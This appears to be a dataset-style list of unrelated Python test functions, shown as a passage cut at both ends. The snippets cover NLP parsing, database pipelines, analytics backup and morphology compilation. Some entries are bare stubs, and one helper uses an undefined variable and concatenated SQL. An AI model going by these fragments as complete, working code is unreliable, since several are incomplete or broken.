'tag': ',', 'compound': ',', 'entity': '', 'lemma': ',', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v86),\n {'word': 'mathematics', 'tag': 'n', 'compound': 'mathematics', 'entity': '', 'lemma': 'mathematic',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v87),\n {'word': ',', 'tag': ',', 'compound': ',', 'entity': '', 'lemma': ',', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v88),\n {'word': 'history', 'tag': 'n', 'compound': 'history', 'entity': '', 'lemma': 'history',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v89),\n {'word': ',', 'tag': ',', 'compound': ',', 'entity': '', 'lemma': ',', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v90),\n {'word': 'exegesis', 'tag': 'n', 'compound': 'exegesis', 'entity': '', 'lemma': 'exegesis',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v92),\n {'word': 'biblical', 'tag': 'j', 'compound': 'biblical', 'entity': '', 'lemma': 'biblical',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v91),\n {'word': ',', 'tag': ',', 'compound': ',', 'entity': '', 'lemma': ',', 'gender_guess': None,\n 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v93),\n {'word': 'criticism', 'tag': 'n', 'compound': 'criticism', 'entity': '', 'lemma': 'criticism',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v96),\n {'word': 'literary', 'tag': 'j', 'compound': 'literary', 'entity': '', 'lemma': 'literary',\n 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false', 'type': None}(v95),\n {'type': 'AMOD'}(v24, v23), {'type': 'ADVMOD'}(v26, v29), {'type': 'ADVMOD'}(v28, v27),\n {'type': 'ADVMOD'}(v29, v28), {'type': 'NSUBJ'}(v40, v37), {'type': 'POSS'}(v44, v42),\n {'type': 'AMOD'}(v44, v43), {'type': 'NSUBJ'}(v47, v46), {'type': 'DOBJ'}(v47, v48),\n {'type': 'PUNCT'}(v47, v68), {'type': 'PREP'}(v48, v49), {'type': 'POBJ'}(v49, v50),\n {'type': 'PUNCT'}(v55, v54), {'type': 'NPADVMOD'}(v56, v55), {'type': 'DOBJ'}(v56, v58),\n {'type': 'PUNCT'}(v56, v59), {'type': 'POSS'}(v63, v61), {'type': 'PREP'}(v63, v64),\n {'type': 'POBJ'}(v64, v65), {'type': 'NSUBJ'}(v70, v69), {'type': 'PREP'}(v70, v71),\n {'type': 'PUNCT'}(v70, v97), {'type': 'POBJ'}(v71, v79), {'type': 'SUBTOK'}(v77, v76),\n {'type': 'SUBTOK'}(v78, v77), {'type': 'AMOD'}(v79, v72), {'type': 'AMOD'}(v79, v73),\n {'type': 'AMOD'}(v79, v74), {'type': 'AMOD'}(v79, v78), {'type': 'PUNCT'}(v79, v80),\n {'type': 'POBJ'}(v82, v83), {'type': 'PUNCT'}(v85, v86), {'type': 'CONJ'}(v85, v87),\n {'type': 'PUNCT'}(v87, v88), {'type': 'CONJ'}(v87, v89), {'type': 'PUNCT'}(v89, v90),\n {'type': 'CONJ'}(v89, v92), {'type': 'AMOD'}(v92, v91), {'type': 'PUNCT'}(v92, v93),\n {'type': 'CONJ'}(v92, v96), {'type': 'AMOD'}(v96, v95), {'type': 'AGENT'}(v2, v0),\n {'type': 'ADVOCATIVE_CLAUSE'}(v19, v26), {'type': 'when'}(v34, v40), {'type': 'of'}(v13, v18),\n {'type': 'AGENT'}(v19, v13), {'type': 'PATIENT'}(v19, v20), {'type': 'in'}(v19, v24),\n {'type': 'NUMBER'}(v55, v53), {'type': 'OWNS'}(v61, v63), {'type': 'OWNS'}(v15, v18),\n {'type': 'PATIENT'}(v2, v5), {'type': 'and'}(v56, v63), {'type': 'and'}(v48, v56),\n {'type': 'and'}(v65, v67), {'type': 'and'}(v83, v85), {'type': 'in'}(v37, v39), {'type': 'to'}(v26, v34),\n {'type': 'as'}(v29, v31), {'type': 'at'}(v40, v44), {'type': 'as'}(v79, v81), {'type': 'of'}(v18, v17),\n {'type': 'ADJECTIVE'}(v11, v10), {'type': 'ADVERB'}(v2, v1), {'type': 'ADJECTIVE'}(v18, v16),\n {'type': 'as'}(v2, v3), {'type': 'as'}(v2, v5)\"\"\")\n lst = drs.apply(DrsMatcher(expected_drs, metric))\n is_match = len(lst) > 1\n self.assertTrue(is_match)", "def testConsistency(self):", "def test_snippet_2(self):\n\n text = \"Jon is a carpenter and an engineer\"\n drs = Drs.create_from_natural_language(text)\n expected_drs = Drs.create_from_predicates_string(\"\"\"\n {'word': 'is', 'tag': 'v', 'compound': 'is', 'entity': '', 'lemma': 'be', 'gender_guess': None, 'is_head_token': True, 'refers_to': None, 'negated': 'false'}(v1), {'word': 'Jon', 'tag': 'n', 'compound': 'Jon', 'entity': 'PERSON', 'lemma': 'Jon', 'gender_guess': 'm', 'is_head_token': False, 'refers_to': None, 'negated': 'false'}(v0), {'word': 'carpenter', 'tag': 'n', 'compound': 'carpenter', 'entity': '', 'lemma': 'carpenter', 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false'}(v3), {'word': 'engineer', 'tag': 'n', 'compound': 'engineer', 'entity': '', 'lemma': 'engineer', 'gender_guess': None, 'is_head_token': False, 'refers_to': None, 'negated': 'false'}(v6), {'type': 'AGENT'}(v1,v0), {'type': 'ATTR'}(v1,v6), {'type': 'ATTR'}(v1,v3), {'type': 'ATTR'}(v1,v6)\n \"\"\")\n lst = drs.apply(DrsMatcher(expected_drs, metric))\n is_match = len(lst) > 1\n self.assertTrue(is_match)", "def test_schema(self):\r\n db_connection = modulestore().db_connection\r\n for collection in [db_connection.course_index, db_connection.structures, db_connection.definitions]:\r\n self.assertEqual(\r\n collection.find({'schema_version': {'$exists': False}}).count(),\r\n 0,\r\n \"{0.name} has records without schema_version\".format(collection)\r\n )\r\n self.assertEqual(\r\n collection.find({'schema_version': {'$ne': SplitMongoModuleStore.SCHEMA_VERSION}}).count(),\r\n 0,\r\n \"{0.name} has records with wrong schema_version\".format(collection)\r\n )", "def test_document_retrieval(self):", "def test_all_documents(self):", "def test_creating_index_type(self):", "def test_analytics_synonyms(self):\n class Query:\n \"\"\" A class to execute analytics queries \"\"\"\n\n def __init__(self, server, username, password):\n self.restconn = RestConnection(server)\n\n def execute(self, query):\n return self.restconn.execute_statement_on_cbas(query, None)\n\n def get_synonyms(self):\n synonyms = set()\n\n for result in json.loads(self.execute(\"select * from Metadata.`Synonym`\"))['results']:\n synonym = result['Synonym']\n synonym_name = synonym['SynonymName']\n synonym_target = synonym['ObjectDataverseName'] + '.' + synonym['ObjectName']\n synonym_dataverse = synonym['DataverseName']\n synonyms.add((synonym_name, synonym_target, synonym_dataverse))\n\n return synonyms\n\n def get_synonyms_count(self):\n return json.loads(self.execute(\"select count(*) as count from Metadata.`Synonym`;\"))['results'][0]['count']\n\n class Dataset:\n\n def __init__(self, name, bucket, clause=None):\n self.name, self.bucket, self.clause = name, bucket, clause\n\n def get_where_clause(self):\n return f\" WHERE {self.clause}\" if self.clause else \"\"\n\n class Synonym:\n\n def __init__(self, name, target):\n self.name, self.target = name, target\n\n class Dataverse:\n\n def __init__(self, name):\n self.name = name\n self.datasets = set()\n self.synonyms = set()\n\n def add_dataset(self, dataset):\n self.datasets.add(dataset)\n\n def add_synonym(self, synonym):\n self.synonyms.add(synonym)\n\n def next_dataset_name(self):\n return f\"dat_{len(self.datasets)}\"\n\n def next_synonym_name(self):\n return f\"syn_{len(self.synonyms)}\"\n\n class Analytics:\n\n def __init__(self, query):\n self.query, self.dataverses = query, set()\n\n def add_dataverse(self, dataverse):\n self.dataverses.add(dataverse)\n\n def next_dataverse_name(self):\n return f\"dtv_{len(self.dataverses)}\"\n\n def pick_target_for_synonym(self):\n choices = [f\"{dataverse.name}.{dataset.name}\" for dataverse in self.dataverses for dataset in dataverse.datasets]\n\n if choices:\n return choice(choices)\n\n return None\n\n def create(self):\n # Create daterverses and datasets\n for dataverse in self.dataverses:\n self.query.execute(f\"CREATE dataverse {dataverse.name}\")\n\n for dataset in dataverse.datasets:\n self.query.execute(f\"CREATE DATASET {dataverse.name}.{dataset.name} ON {dataset.bucket}{dataset.get_where_clause()}\")\n\n # Create synonyms\n for dataverse in self.dataverses:\n for synonym in dataverse.synonyms:\n self.query.execute(f\"CREATE analytics synonym {dataverse.name}.{synonym.name} FOR {synonym.target}\")\n\n def delete(self):\n for dataverse in self.dataverses:\n for dataset in dataverse.datasets:\n self.query.execute(f\"DROP DATASET {dataverse.name}.{dataset.name}\")\n\n for synonym in dataverse.synonyms:\n self.query.execute(f\"DROP analytics synonym {dataverse.name}.{synonym.name}\")\n\n self.query.execute(f\"DROP dataverse {dataverse.name}\")\n\n class AnalyticsTest:\n\n def __init__(self, backup, no_of_dataverses, no_of_datasets, no_of_synonyms, analytics_server):\n # The base class\n self.backup = backup\n\n # Test parameters\n self.no_of_dataverses, self.no_of_datasets, self.no_of_synonyms = no_of_dataverses, no_of_datasets, no_of_synonyms\n\n # The number of synonyms that get created\n self.no_of_synonyms_created = no_of_dataverses * no_of_synonyms\n\n # The object thats used to run queries on the server running analytics\n self.query = Query(analytics_server, analytics_server.rest_username, analytics_server.rest_password)\n\n # The object that represents our current model of analytics\n self.analytics = Analytics(self.query)\n\n def test_analytics(self):\n # Define the analytics model (i.e. which dataverses, datasets and synonyms are present)\n for i in range(self.no_of_dataverses):\n dataverse = Dataverse(self.analytics.next_dataverse_name())\n self.analytics.add_dataverse(dataverse)\n\n for j in range(self.no_of_datasets):\n dataset = Dataset(dataverse.next_dataset_name(), 'default')\n dataverse.add_dataset(dataset)\n\n for j in range(self.no_of_synonyms):\n synonym = Synonym(dataverse.next_synonym_name(), self.analytics.pick_target_for_synonym())\n dataverse.add_synonym(synonym)\n\n # Create dataverses, datasets and synonyms\n self.analytics.create()\n self.backup.assertEqual(self.query.get_synonyms_count(), self.no_of_synonyms_created)\n\n # Create a repository\n self.backup.backup_create()\n\n # Take a backup\n self.backup.backup_cluster()\n\n # Delete all analytics related stuff\n self.analytics.delete()\n self.backup.assertEqual(self.query.get_synonyms_count(), 0)\n\n # Perform a one off restore\n self.backup.backup_restore()\n synonyms = self.query.get_synonyms()\n\n # Check synonyms have been restored\n for dataverse in self.analytics.dataverses:\n for synonym in dataverse.synonyms:\n self.backup.assertIn((synonym.name, synonym.target, dataverse.name), synonyms)\n\n # The server that will be reprovisioned with analytics\n analytics_server = self.restore_cluster_host = self.servers[2]\n\n # Add a server and provision it with analytics\n self.add_server_with_custom_services(analytics_server, services=[\"cbas\"])\n\n # A little sleep for services to warmup\n self.assertTrue(RestConnection(analytics_server).wait_until_cbas_is_ready(100))\n\n # Run the analytics test\n AnalyticsTest(self, self.input.param(\"dataverses\", 5), self.input.param(\"datasets\", 5), self.input.param(\"synonyms\", 5), analytics_server).test_analytics()", "def test_match(add_doc, add_institution):\n\n doc = add_doc(log={\n 'url': 'http://yale.edu/syllabus.pdf'\n })\n\n yale = add_institution(\n name='Yale University',\n domain='yale.edu',\n )\n\n harvard = add_institution(\n name='Harvard University',\n domain='harvard.edu',\n )\n\n doc_to_inst(doc.id)\n\n # Should write a link.\n assert Institution_Document.select().count() == 1\n\n # Should link the right rows.\n assert Institution_Document.select().where(\n Institution_Document.institution==yale,\n Institution_Document.document==doc,\n )", "def test_primary_keys_metadata(sdc_builder, sdc_executor, database, values):\n if not database.is_ct_enabled:\n pytest.skip('Test only runs against SQL Server with CT enabled.')\n\n pipeline = None\n table_name = get_random_string(string.ascii_lowercase, 20)\n\n try:\n connection = database.engine.connect()\n\n if values == 'numeric':\n connection.execute(get_create_table_query_numeric(table_name, database))\n else:\n connection.execute(get_create_table_query_non_numeric(table_name, database))\n\n # Create the pipeline\n pipeline_builder = sdc_builder.get_pipeline_builder()\n sql_server_change_tracking = pipeline_builder.add_stage('SQL Server Change Tracking Client')\n sql_server_change_tracking.set_attributes(\n table_configs=[{\n 'initialOffset': 0,\n 'schema': 'dbo',\n 'tablePattern': f'{table_name}'\n }]\n )\n wiretap = pipeline_builder.add_wiretap()\n sql_server_change_tracking >> wiretap.destination\n\n pipeline = pipeline_builder.build(\"SQL Server CT Pipeline\").configure_for_environment(database)\n sdc_executor.add_pipeline(pipeline)\n connection = database.engine.connect()\n # enable change tracking on table\n connection.execute(f'ALTER TABLE {table_name} ENABLE change_tracking WITH (track_columns_updated = on)')\n sdc_executor.start_pipeline(pipeline)\n\n if values == 'numeric':\n connection.execute(get_insert_query_numeric(table_name, database))\n primary_key_specification_expected = PRIMARY_KEY_NUMERIC_METADATA_SQLSERVER\n else:\n connection.execute(get_insert_query_non_numeric(table_name, database))\n primary_key_specification_expected = PRIMARY_KEY_NON_NUMERIC_METADATA_SQLSERVER\n\n sdc_executor.wait_for_pipeline_metric(pipeline, 'input_record_count', 1)\n\n assert len(wiretap.output_records) == 1\n\n record = wiretap.output_records[0]\n assert \"jdbc.primaryKeySpecification\" in record.header.values\n assert record.header.values[\"jdbc.primaryKeySpecification\"] is not None\n\n primary_key_specification_json = json.dumps(\n json.loads(record.header.values[\"jdbc.primaryKeySpecification\"]),\n sort_keys=True\n )\n\n primary_key_specification_expected_json = json.dumps(\n json.loads(primary_key_specification_expected),\n sort_keys=True\n )\n\n assert primary_key_specification_json == primary_key_specification_expected_json\n\n finally:\n logger.info('Dropping table %s in %s database...', table_name, database.type)\n connection.execute(f'drop table if exists {table_name}')\n\n if pipeline and (sdc_executor.get_pipeline_status(pipeline).response.json().get('status') == 'RUNNING'):\n sdc_executor.stop_pipeline(pipeline)", "def test_search_collection_object_type():\n col = Collection(search='forest', object_type=['layer', 'dataset', 'widget'], app=['gfw'])\n assert len(col) > 1", "def test_import_data():\n\n file_path = os.path.join(CONST_ADVANTICSYS_DIR, CONST_ADVANTICSYS_TEST_1)\n\n # Bring df\n success, log, test_ingress_df = advanticsys_import(file_path)\n assert success, log\n assert isinstance(test_ingress_df, pd.DataFrame)\n\n # Test import function\n success, log = import_data(\n test_ingress_df,\n CONST_ADVANTICSYS,\n SQL_USER,\n SQL_PASSWORD,\n SQL_HOST,\n SQL_PORT,\n SQL_TEST_DBNAME\n )\n\n assert success is True, log \n assert log == \"New: 0 (uploaded); Duplicates: 75 (ignored)\"", "def test_ds(self, obj):\n pass", "def setup_compare_functional_loci(con):\n\n cur = con.cursor()\n\n sql = \"delete from Compare_DNDS_Fscores\"\n cur.execute(sql)\n con.commit()\n\n sql = \"select id from DNDS_Models where name='Nsites_branch'\"\n cur.execute(sql)\n x = cur.fetchall()\n if x.__len__() == 0:\n write_log(\n con, \"There are no DNDS_Models in the database, so I'm skipping the comparison of DNDS to Df.\")\n return\n nsites_id = x[0][0]\n\n sql = \"select id from AlignmentMethods where name='muscle'\"\n cur.execute(sql)\n muscleid = cur.fetchone()\n if muscleid is None:\n print \"\\n. Warning - the comparison of functional loci is hardcoded to use the MUSCLE alignment\"\n print \"but it appears that the muscle method wasn't used with your data.\"\n print \"I'm skipping the comparison\"\n return\n muscleid = muscleid[0]\n ml_modelid = get_ml_model(con, muscle)\n\n sql = \"select id, almethod, anc1, anc2 from DNDS_Tests where dnds_model=\" + \\\n nsites_id.__str__() + \" and phylomodel=\" + ml_modelid.__str__()\n cur.execute(sql)\n x = cur.fetchall()\n for ii in x:\n dnds_testid = ii[0]\n almethod = ii[1]\n phylomodel = ml_modelid\n anc1 = ii[2]\n anc2 = ii[3]\n\n if anc1 == anc2:\n write_log(con, \"I'm skipping the dnds comparison \" +\n dnds_testid.__str__() + \" because anc 1 and 2 match.\")\n continue\n\n \"\"\"Find the matching Fscore test\"\"\"\n sql = \"select id from FScore_Tests where almethod=\" + almethod.__str__() + \" and phylomodel=\" + \\\n phylomodel.__str__() + \" and ancid1=\" + anc1.__str__() + \\\n \" and ancid2=\" + anc2.__str__()\n cur.execute(sql)\n y = cur.fetchall()\n if y.__len__() > 0:\n fscore_testid = y[0][0]\n\n sql = \"insert into Compare_DNDS_Fscores (dnds_testid, fscore_testid) values(\" + \\\n dnds_testid.__str__()\n sql += \",\" + fscore_testid.__str__() + \")\"\n cur.execute(sql)\n con.commit()", "def test_search_collection():\n col = Collection(search='forest', app=['gfw'])\n assert len(col) > 1", "def test_jdbc_tables_header(sdc_builder, sdc_executor, database):\n\n table_name1 = get_random_string(string.ascii_lowercase, 20)\n table_name2 = get_random_string(string.ascii_lowercase, 20)\n if database.type == 'Oracle':\n # When not quoted, Oracle automatically converts names to upper case. Quoting is inconsistent between\n # databases, so it is preferable to avoid it in SQL below. And to get a compatible result during creation,\n # we omit quotes here also.\n create_quotes_names = False\n else:\n create_quotes_names = True\n\n logger.info('Creating two identical tables in %s database...', database.type)\n table1 = _create_table(table_name1, database, quote=create_quotes_names)\n table2 = _create_table(table_name2, database, quote=create_quotes_names)\n\n connection = database.engine.connect()\n try:\n logger.info('Adding %s rows into each table...', len(ROWS_IN_DATABASE))\n connection.execute(table1.insert(), ROWS_IN_DATABASE)\n connection.execute(table2.insert(), ROWS_IN_DATABASE)\n\n builder = sdc_builder.get_pipeline_builder()\n\n sql_query = \"SELECT t1.id, t2.name \" \\\n f\"FROM {table_name1} t1 \" \\\n f\" JOIN {table_name2} t2 \" \\\n \" ON t1.name = t2.name \" \\\n \"WHERE t1.id > ${OFFSET} \" \\\n \"ORDER BY t1.id\"\n origin = builder.add_stage('JDBC Query Consumer')\n origin.sql_query = sql_query\n origin.offset_column = 'id'\n origin.incremental_mode = True\n origin.on_unknown_type = 'STOP_PIPELINE'\n\n wiretap = builder.add_wiretap()\n\n origin >> wiretap.destination\n\n pipeline = builder.build().configure_for_environment(database)\n sdc_executor.add_pipeline(pipeline)\n\n sdc_executor.start_pipeline(pipeline)\n sdc_executor.wait_for_pipeline_metric(pipeline, 'input_record_count', 3)\n sdc_executor.stop_pipeline(pipeline)\n\n # Check jdbc.tables header.\n tables_header = wiretap.output_records[0].header['values']['jdbc.tables']\n logger.debug('%s=\"%s\"', \"header['values']['jdbc.tables']\", tables_header)\n logger.debug('%s=\"%s\"', \"database.type\", database.type)\n # According to documentation some JDBC drivers may not provide this information:\n # https://docs.streamsets.com/platform-datacollector/latest/datacollector/UserGuide/Origins/JDBCConsumer.html\n if database.type == 'Oracle':\n # Oracle does not seem to populate this field\n assert tables_header == \"\"\n elif database.type == 'SQLServer':\n # SQLServer does not seem to populate this field\n assert tables_header == \"\"\n else:\n # MySQL, PostgreSQL and MiriaDB all return source table names as a coma-delimited list.\n # Ordering of the list is not known for PostgreSQL and MiriaDB, but For MySQL it is predictably random.\n # The logic below asserts that both names are reported in any order (and case is ignored, though this\n # should not be necessary):\n tables_list = tables_header.split(',')\n tables_normalized_map = map(lambda x:x.lower(), tables_list)\n assert set(tables_normalized_map) == {table_name1, table_name2}\n\n finally:\n try:\n logger.info('Dropping table %s in %s database ...', table_name1, database.type)\n connection.execute(f\"DROP TABLE {table_name1}\")\n logger.info('Dropping table %s in %s database ...', table_name2, database.type)\n connection.execute(f\"DROP TABLE {table_name2}\")\n except Exception as ex:\n logger.warning('Error during cleanup', exc_info=ex)", "def test_tables_have_data(dataset, project_id, concepts):\n\n for folder, concept_list in concepts.items():\n for concept_name in concept_list:\n query = f\"\"\"\n SELECT *\n FROM {dataset}.{concept_name}\n LIMIT 5\n \"\"\"\n df = gbq.read_gbq(query, project_id=project_id, dialect=\"standard\")\n assert df.shape[0] > 0, f'did not find table for {folder}.{concept_name}'", "def test_a_general(self):\n\n # Create the default application settings -- note that we have only one morpheme delimiter.\n # This is relevant to the morphemic language model.\n application_settings = h.generate_default_application_settings()\n application_settings.morpheme_delimiters = u'-'\n Session.add(application_settings)\n Session.commit()\n\n # Create some syntactic categories\n cats = {\n 'N': model.SyntacticCategory(name=u'N'),\n 'V': model.SyntacticCategory(name=u'V'),\n 'AGR': model.SyntacticCategory(name=u'AGR'),\n 'Agr': model.SyntacticCategory(name=u'Agr'),\n 'PHI': model.SyntacticCategory(name=u'PHI'),\n 'S': model.SyntacticCategory(name=u'S'),\n 'D': model.SyntacticCategory(name=u'D')\n }\n Session.add_all(cats.values())\n Session.commit()\n cats = dict([(k, v.id) for k, v in cats.iteritems()])\n\n dataset = (\n ('chien', 'chien', 'dog', 'dog', cats['N']),\n ('chat', 'chat', 'cat', 'cat', cats['N']),\n ('oiseau', 'oiseau', 'bird', 'bird', cats['N']),\n ('cheval', 'cheval', 'horse', 'horse', cats['N']),\n ('vache', 'vache', 'cow', 'cow', cats['N']),\n ('grenouille', 'grenouille', 'frog', 'frog', cats['N']),\n ('tortue', 'tortue', 'turtle', 'turtle', cats['N']),\n ('fourmi', 'fourmi', 'ant', 'ant', cats['N']),\n ('poule!t', 'poule!t', 'chicken', 'chicken', cats['N']), # note the ! which is a foma reserved symbol\n (u'be\\u0301casse', u'be\\u0301casse', 'woodcock', 'woodcock', cats['N']),\n\n ('parle', 'parle', 'speak', 'speak', cats['V']),\n ('grimpe', 'grimpe', 'climb', 'climb', cats['V']),\n ('nage', 'nage', 'swim', 'swim', cats['V']),\n ('tombe', 'tombe', 'fall', 'fall', cats['V']),\n\n ('le', 'le', 'the', 'the', cats['D']),\n ('la', 'la', 'the', 'the', cats['D']),\n\n ('s', 's', 'PL', 'plural', cats['PHI']),\n\n ('ait', 'ait', '3SG.IMPV', 'third person singular imperfective', cats['AGR']),\n ('ait', 'ait', '3IMP', 'third person imparfait', cats['Agr']),\n ('aient', 'aient', '3PL.IMPV', 'third person plural imperfective', cats['AGR']),\n\n ('Les chats nageaient.', 'le-s chat-s nage-aient', 'the-PL cat-PL swim-3PL.IMPV',\n 'The cats were swimming.', cats['S']),\n ('La tortue parlait', 'la tortue parle-ait', 'the turtle speak-3SG.IMPV',\n 'The turtle was speaking.', cats['S']),\n ('La tortue tombait', 'la tortue tombe-ait', 'the turtle fall-3SG.IMPV',\n 'The turtle was falling.', cats['S']),\n ('Le chien parlait', 'le chien parle-ait', 'the dog speak-3IMP',\n 'The dog was speaking.', cats['S'])\n )\n\n for tuple_ in dataset:\n self.create_form(*map(unicode, tuple_))\n\n # Create a form search model that returns lexical items (will be used to create the lexicon corpus)\n query = {'filter': ['Form', 'syntactic_category', 'name', 'in', [u'N', u'V', u'AGR', u'PHI', u'D', u'Agr']]}\n params = self.form_search_create_params.copy()\n params.update({\n 'name': u'Find morphemes',\n 'search': query\n })\n params = json.dumps(params)\n response = self.app.post(url('formsearches'), params, self.json_headers, self.extra_environ_admin)\n lexicon_form_search_id = json.loads(response.body)['id']\n\n # Create the lexicon corpus\n params = self.corpus_create_params.copy()\n params.update({\n 'name': u'Corpus of lexical items',\n 'form_search': lexicon_form_search_id\n })\n params = json.dumps(params)\n response = self.app.post(url('corpora'), params, self.json_headers, self.extra_environ_admin)\n lexicon_corpus_id = json.loads(response.body)['id']\n\n # Create a form search model that returns sentences (will be used to create the rules corpus)\n query = {'filter': ['Form', 'syntactic_category', 'name', '=', u'S']}\n params = self.form_search_create_params.copy()\n params.update({\n 'name': u'Find sentences',\n 'description': u'Returns all sentential forms',\n 'search': query\n })\n params = json.dumps(params)\n response = self.app.post(url('formsearches'), params, self.json_headers, self.extra_environ_admin)\n rules_form_search_id = json.loads(response.body)['id']\n\n # Create the rules corpus\n params = self.corpus_create_params.copy()\n params.update({\n 'name': u'Corpus of sentences',\n 'form_search': rules_form_search_id\n })\n params = json.dumps(params)\n response = self.app.post(url('corpora'), params, self.json_headers, self.extra_environ_admin)\n rules_corpus_id = json.loads(response.body)['id']\n\n # Create a morphology using the lexicon and rules corpora\n name = u'Morphology of a very small subset of french'\n morphology_params = self.morphology_create_params.copy()\n morphology_params.update({\n 'name': name,\n 'lexicon_corpus': lexicon_corpus_id,\n 'rules_corpus': rules_corpus_id,\n 'script_type': 'regex'\n })\n morphology_params = json.dumps(morphology_params)\n response = self.app.post(url('morphologies'), morphology_params,\n self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n morphology_id = resp['id']\n assert resp['name'] == name\n assert resp['script_type'] == u'regex'\n\n # If foma is not installed, make sure the error message is being returned\n # and exit the test.\n if not h.foma_installed(force_check=True):\n response = self.app.put(url(controller='morphologies', action='generate_and_compile',\n id=morphology_id), headers=self.json_headers,\n extra_environ=self.extra_environ_contrib, status=400)\n resp = json.loads(response.body)\n assert resp['error'] == u'Foma and flookup are not installed.'\n return\n\n # Compile the morphology's script\n response = self.app.put(url(controller='morphologies', action='generate_and_compile',\n id=morphology_id), headers=self.json_headers,\n extra_environ=self.extra_environ_contrib)\n resp = json.loads(response.body)\n compile_attempt = resp['compile_attempt']\n\n # Poll ``GET /morphologies/morphology_id`` until ``compile_attempt`` has changed.\n requester = lambda: self.app.get(url('morphology', id=morphology_id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = self.poll(requester, 'generate_attempt', compile_attempt, log, wait=1,\n vocal=True, task_descr='compile morphology %s' % morphology_id)\n assert resp['compile_message'] == \\\n u'Compilation process terminated successfully and new binary file was written.'\n\n response = self.app.get(url('morphology', id=morphology_id), params={'script': u'1', 'lexicon': u'1'},\n headers=self.json_headers, extra_environ=self.extra_environ_contrib)\n resp = json.loads(response.body)\n morphology_dir = os.path.join(self.morphologies_path, 'morphology_%d' % morphology_id)\n morphology_binary_filename = 'morphology.foma'\n morphology_dir_contents = os.listdir(morphology_dir)\n morphology_script_path = os.path.join(morphology_dir, 'morphology.script')\n morphology_script = codecs.open(morphology_script_path, mode='r', encoding='utf8').read()\n assert u'define morphology' in morphology_script\n assert u'(NCat)' in morphology_script # cf. tortue\n assert u'(DCat)' in morphology_script # cf. la\n assert u'(NCat \"-\" PHICat)' in morphology_script # cf. chien-s\n assert u'(DCat \"-\" PHICat)' in morphology_script # cf. le-s\n assert u'(VCat \"-\" AGRCat)' in morphology_script # cf. nage-aient, parle-ait\n assert u'c h a t \"%scat%sN\":0' % (h.rare_delimiter, h.rare_delimiter) in morphology_script # cf. extract_morphemes_from_rules_corpus = False and chat's exclusion from the lexicon corpus\n assert u'c h i e n \"%sdog%sN\":0' % (h.rare_delimiter, h.rare_delimiter) in morphology_script\n assert u'b e \\u0301 c a s s e \"%swoodcock%sN\":0' % (h.rare_delimiter, h.rare_delimiter) in morphology_script\n assert resp['compile_succeeded'] == True\n assert resp['compile_message'] == u'Compilation process terminated successfully and new binary file was written.'\n assert morphology_binary_filename in morphology_dir_contents\n assert resp['modifier']['role'] == u'contributor'\n rules = resp['rules_generated']\n assert u'D' in rules # cf. le\n assert u'N' in rules # cf. tortue\n assert u'D-PHI' in rules # cf. le-s\n assert u'N-PHI' in rules # cf. chien-s\n assert u'V-AGR' in rules # cf. nage-aient, parle-ait\n assert 'lexicon' in resp\n assert 'script' in resp\n assert resp['script'] == morphology_script\n assert [u'chat', u'cat'] in resp['lexicon']['N']\n assert [u'chien', u'dog'] in resp['lexicon']['N']\n\n # Test GET /morphologies/1?script=1&lexicon=1 and make sure the script and lexicon are returned\n response = self.app.get(url('morphology', id=morphology_id), params={'script': u'1', 'lexicon': u'1'},\n headers=self.json_headers, extra_environ=self.extra_environ_contrib)\n resp = json.loads(response.body)\n assert resp['script'] == morphology_script\n lexicon = resp['lexicon']\n assert ['s', 'PL'] in lexicon['PHI']\n assert ['oiseau', 'bird'] in lexicon['N']\n assert ['aient', '3PL.IMPV'] in lexicon['AGR']\n assert ['la', 'the'] in lexicon['D']\n assert ['nage', 'swim'] in lexicon['V']\n\n ################################################################################\n # BEGIN IMPOVERISHED REPRESENTATION MORPHOLOGY\n ################################################################################\n\n # Create a new morphology, this time one that parses to impoverished representations.\n impoverished_name = u'Morphology of a very small subset of french, impoverished morphemes'\n morphology_params = self.morphology_create_params.copy()\n morphology_params.update({\n 'name': impoverished_name,\n 'lexicon_corpus': lexicon_corpus_id,\n 'rules_corpus': rules_corpus_id,\n 'script_type': 'regex',\n 'rich_upper': False\n })\n morphology_params = json.dumps(morphology_params)\n response = self.app.post(url('morphologies'), morphology_params, self.json_headers, self.extra_environ_admin)\n resp = json.loads(response.body)\n impoverished_morphology_id = resp['id']\n assert resp['name'] == impoverished_name\n assert resp['script_type'] == u'regex'\n\n # Compile the morphology's script\n response = self.app.put(url(controller='morphologies', action='generate_and_compile',\n id=impoverished_morphology_id), headers=self.json_headers,\n extra_environ=self.extra_environ_contrib)\n resp = json.loads(response.body)\n compile_attempt = resp['compile_attempt']\n\n # Poll ``GET /morphologies/morphology_id`` until ``compile_attempt`` has changed.\n requester = lambda: self.app.get(url('morphology', id=impoverished_morphology_id),\n headers=self.json_headers, extra_environ=self.extra_environ_admin)\n resp = self.poll(requester, 'generate_attempt', compile_attempt, log, wait=1,\n vocal=True, task_descr='compile morphology %s' % impoverished_morphology_id)\n assert resp['compile_message'] == \\\n u'Compilation process terminated successfully and new binary file was written.'\n\n response = self.app.get(url('morphology', id=impoverished_morphology_id), params={'script': u'1', 'lexicon': u'1'},\n headers=self.json_headers, extra_environ=self.extra_environ_contrib)\n resp = json.loads(response.body)\n morphology_dir = os.path.join(self.morphologies_path, 'morphology_%d' % impoverished_morphology_id)\n morphology_binary_filename = 'morphology.foma'\n morphology_dir_contents = os.listdir(morphology_dir)\n morphology_script_path = os.path.join(morphology_dir, 'morphology.script')\n morphology_script = codecs.open(morphology_script_path, mode='r', encoding='utf8').read()\n assert u'define morphology' in morphology_script\n assert u'(NCat)' in morphology_script # cf. tortue\n assert u'(DCat)' in morphology_script # cf. la\n assert u'(NCat \"-\" 